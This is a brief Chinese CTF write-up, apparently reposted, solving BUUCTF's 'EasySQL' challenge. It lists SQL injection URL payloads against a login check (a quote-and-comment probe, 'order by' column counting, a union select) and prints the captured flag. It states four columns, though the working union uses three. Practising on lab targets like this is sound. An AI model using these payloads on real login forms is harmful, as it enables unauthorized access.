每天一道CTF

思路：


點擊“登陸”：

利用 hackbar load:
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ – -&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 1 – -&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 3 – -&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 4 – -&password=1

驗證有4列。
然后常規思路：union select: 居然就有flag了：
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ union select 1,2,3 – -&password=1

flag{2c4ccab2-f25f-4dd4-b513-e32bee83c8f8}

總結

以上是生活随笔為你收集整理的每天一道CTF---BUUCTF---练习场----EasySQL1---的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。